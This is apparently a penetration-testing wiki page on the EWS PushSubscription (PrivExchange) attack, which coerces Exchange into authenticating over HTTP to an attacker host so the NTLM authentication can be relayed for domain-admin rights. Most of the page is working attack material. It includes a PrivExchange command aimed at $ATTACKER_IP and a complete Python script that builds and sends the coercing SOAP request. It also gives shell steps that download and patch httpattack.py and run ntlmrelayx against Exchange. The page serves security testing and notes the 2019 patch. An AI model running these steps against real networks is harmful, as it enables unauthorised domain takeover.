# PushSubscription abuse

## Theory

"PushSubscription" is an operation of Exchange Web Services (EWS) that lets a client subscribe to push notifications: Exchange then periodically POSTs notifications to a URL chosen by the subscriber. Attackers abuse it to make the Exchange server authenticate to a host of their choosing. **The coerced authentication is made over HTTP**, which is particularly powerful when doing [NTLM relay](broken://pages/PFGlaZOk9WQQxTsZmSJ0): NTLM authentication initiated over HTTP does not negotiate session signing, so it can be relayed to LDAP, unlike authentication originating from SMB ([see the Session Signing and MIC mitigations](broken://pages/PFGlaZOk9WQQxTsZmSJ0#mic-message-integrity-code)). As Exchange servers usually have high privileges in a domain (i.e. `WriteDacl` on the domain object, see [Abusing ACLs](broken://pages/4BIFRCf5fXqahfOIAeGb)), the forced authentication can then be relayed and abused to obtain domain admin privileges (see [NTLM Relay](broken://pages/PFGlaZOk9WQQxTsZmSJ0) and [Kerberos Unconstrained Delegations](/ad/movement/kerberos/delegations.md#unconstrained-delegations-kud)).

## Practice

[PrivExchange](https://github.com/dirkjanm/privexchange/) (Python) logs in to Exchange Web Services with the supplied credentials and calls that API, pointing the subscription URL at the attacker host (`-ah`), where a relay server such as ntlmrelayx.py should already be listening.

```bash
privexchange.py -d "$DOMAIN" -u "$DOMAIN_USER" -p "$PASSWORD" -ah "$ATTACKER_IP" "$EXCHANGE_SERVER_TARGET"
```
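The following script is an added example and is not PrivExchange's code: it builds the EWS `Subscribe`/`PushSubscriptionRequest` SOAP message described in the Theory section, parses Exchange's reply, and optionally sends the request with NTLM authentication. It assumes the EWS endpoint lives at `https://<exchange>/EWS/Exchange.asmx`, that the endpoint accepts NTLM, and that the third-party `requests` and `requests_ntlm` packages are installed only if `send_push_subscription()` is used; the sample responses embedded at the bottom are constructed to show the reply format, not captured from a real server.

```python
"""Added example (not PrivExchange's code): build the EWS PushSubscription
request that coerces Exchange into authenticating to an attacker URL, and
parse the SubscribeResponse. Offline parts (build/parse) need only the
standard library; send_push_subscription() assumes `requests` + `requests_ntlm`.
"""
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

NS = {
    "s": "http://schemas.xmlsoap.org/soap/envelope/",
    "t": "http://schemas.microsoft.com/exchange/services/2006/types",
    "m": "http://schemas.microsoft.com/exchange/services/2006/messages",
}


def build_push_subscription_request(attacker_url: str, status_frequency: int = 1) -> str:
    """Return the SOAP envelope for a push subscription to all folders.

    StatusFrequency is in minutes (EWS allows 1..1440): Exchange POSTs a
    status notification to <t:URL> that often, and that POST carries the
    NTLM authentication of the Exchange server that gets relayed.
    """
    if not 1 <= status_frequency <= 1440:
        raise ValueError("StatusFrequency must be between 1 and 1440 minutes")
    return f"""<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="{NS['s']}" xmlns:t="{NS['t']}" xmlns:m="{NS['m']}">
  <soap:Header>
    <t:RequestServerVersion Version="Exchange2013" />
  </soap:Header>
  <soap:Body>
    <m:Subscribe>
      <m:PushSubscriptionRequest SubscribeToAllFolders="true">
        <t:EventTypes>
          <t:EventType>NewMailEvent</t:EventType>
          <t:EventType>CreatedEvent</t:EventType>
          <t:EventType>ModifiedEvent</t:EventType>
        </t:EventTypes>
        <t:StatusFrequency>{status_frequency}</t:StatusFrequency>
        <t:URL>{escape(attacker_url)}</t:URL>
      </m:PushSubscriptionRequest>
    </m:Subscribe>
  </soap:Body>
</soap:Envelope>"""


def parse_subscribe_response(xml_text: str) -> str:
    """Return the SubscriptionId from a successful reply; raise otherwise.

    A failed call still returns HTTP 200 with ResponseClass="Error", so the
    ResponseCode must be checked rather than the HTTP status alone.
    """
    root = ET.fromstring(xml_text)
    msg = root.find(".//m:SubscribeResponseMessage", NS)
    if msg is None:
        raise RuntimeError("no SubscribeResponseMessage (SOAP fault or wrong endpoint?)")
    if msg.get("ResponseClass") != "Success":
        code = msg.findtext("m:ResponseCode", default="unknown", namespaces=NS)
        raise RuntimeError(f"subscription refused: {code}")
    sub_id = msg.findtext("m:SubscriptionId", namespaces=NS)
    if not sub_id:
        raise RuntimeError("success response without SubscriptionId")
    return sub_id


def send_push_subscription(ews_url, domain, user, password, attacker_url, status_frequency=1):
    """POST the request with NTLM auth (assumes `requests` and `requests_ntlm`)."""
    import requests  # imported lazily so build/parse work without it
    from requests_ntlm import HttpNtlmAuth

    body = build_push_subscription_request(attacker_url, status_frequency)
    # verify=False is an assumption: lab Exchange servers commonly use self-signed certs.
    resp = requests.post(
        ews_url, data=body, auth=HttpNtlmAuth(f"{domain}\\{user}", password),
        headers={"Content-Type": "text/xml; charset=utf-8"}, verify=False, timeout=30,
    )
    resp.raise_for_status()
    return parse_subscribe_response(resp.text)


# Constructed sample replies (shape of EWS responses, not real captures).
SAMPLE_SUCCESS = """<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
  <s:Body>
    <m:SubscribeResponse xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages"
                         xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types">
      <m:ResponseMessages>
        <m:SubscribeResponseMessage ResponseClass="Success">
          <m:ResponseCode>NoError</m:ResponseCode>
          <m:SubscriptionId>JwBtYWlsMDEuY29ycC5sb2NhbBAAAAA=</m:SubscriptionId>
          <m:Watermark>AAAAAGoAAAA=</m:Watermark>
        </m:SubscribeResponseMessage>
      </m:ResponseMessages>
    </m:SubscribeResponse>
  </s:Body>
</s:Envelope>"""

SAMPLE_ERROR = """<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
  <s:Body>
    <m:SubscribeResponse xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages">
      <m:ResponseMessages>
        <m:SubscribeResponseMessage ResponseClass="Error">
          <m:MessageText>The request is invalid.</m:MessageText>
          <m:ResponseCode>ErrorInvalidRequest</m:ResponseCode>
        </m:SubscribeResponseMessage>
      </m:ResponseMessages>
    </m:SubscribeResponse>
  </s:Body>
</s:Envelope>"""

if __name__ == "__main__":
    print(build_push_subscription_request("http://10.0.0.5/"))
    print("subscription id:", parse_subscribe_response(SAMPLE_SUCCESS))
```

Once the subscription is accepted, nothing further is needed from the attacker side: Exchange itself initiates the HTTP connection to `<t:URL>` within `StatusFrequency` minutes, so the relay listener must stay up for at least that long, and a response with `ResponseClass="Error"` means the request was refused even though the HTTP status is 200.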

{% hint style="info" %}
In the situation where the tester doesn't have any credentials, it is still possible to [relay an authentication](broken://pages/PFGlaZOk9WQQxTsZmSJ0) (one captured from another victim) to the EWS endpoint and make the API call in the victim's name.

The modified [httpattack.py](https://github.com/dirkjanm/PrivExchange/blob/master/httpattack.py) from the PrivExchange repository can be used with ntlmrelayx.py to perform this attack. The attacker host is hard-coded in the script, so it must be edited before impacket is reinstalled. The `sed` command below uses `|` as delimiter because the attacker URL contains slashes.

```bash
cd /PATH/TO/impacket/impacket/examples/ntlmrelayx/attacks/
mv httpattack.py httpattack.py.old
wget https://raw.githubusercontent.com/dirkjanm/PrivExchange/master/httpattack.py
sed -i "s|attacker_url = .*$|attacker_url = \"$ATTACKER_URL\"|" httpattack.py
cd /PATH/TO/impacket
pip3 install .
ntlmrelayx.py -t https://exchange.server/EWS/Exchange.asmx
```

{% endhint %}

{% hint style="warning" %}
On February 12th 2019, Microsoft released updates for Exchange which resolved

* the coerced authentication issue (Exchange no longer authenticates with its own credentials when delivering push notifications)
* the excessive permissions Exchange servers held in the domain, which allowed an attacker to fully compromise it

On a patched environment, the subscription may still be accepted, but the resulting HTTP notification carries no NTLM authentication to relay.
{% endhint %}

## References

{% embed url="https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/" %}
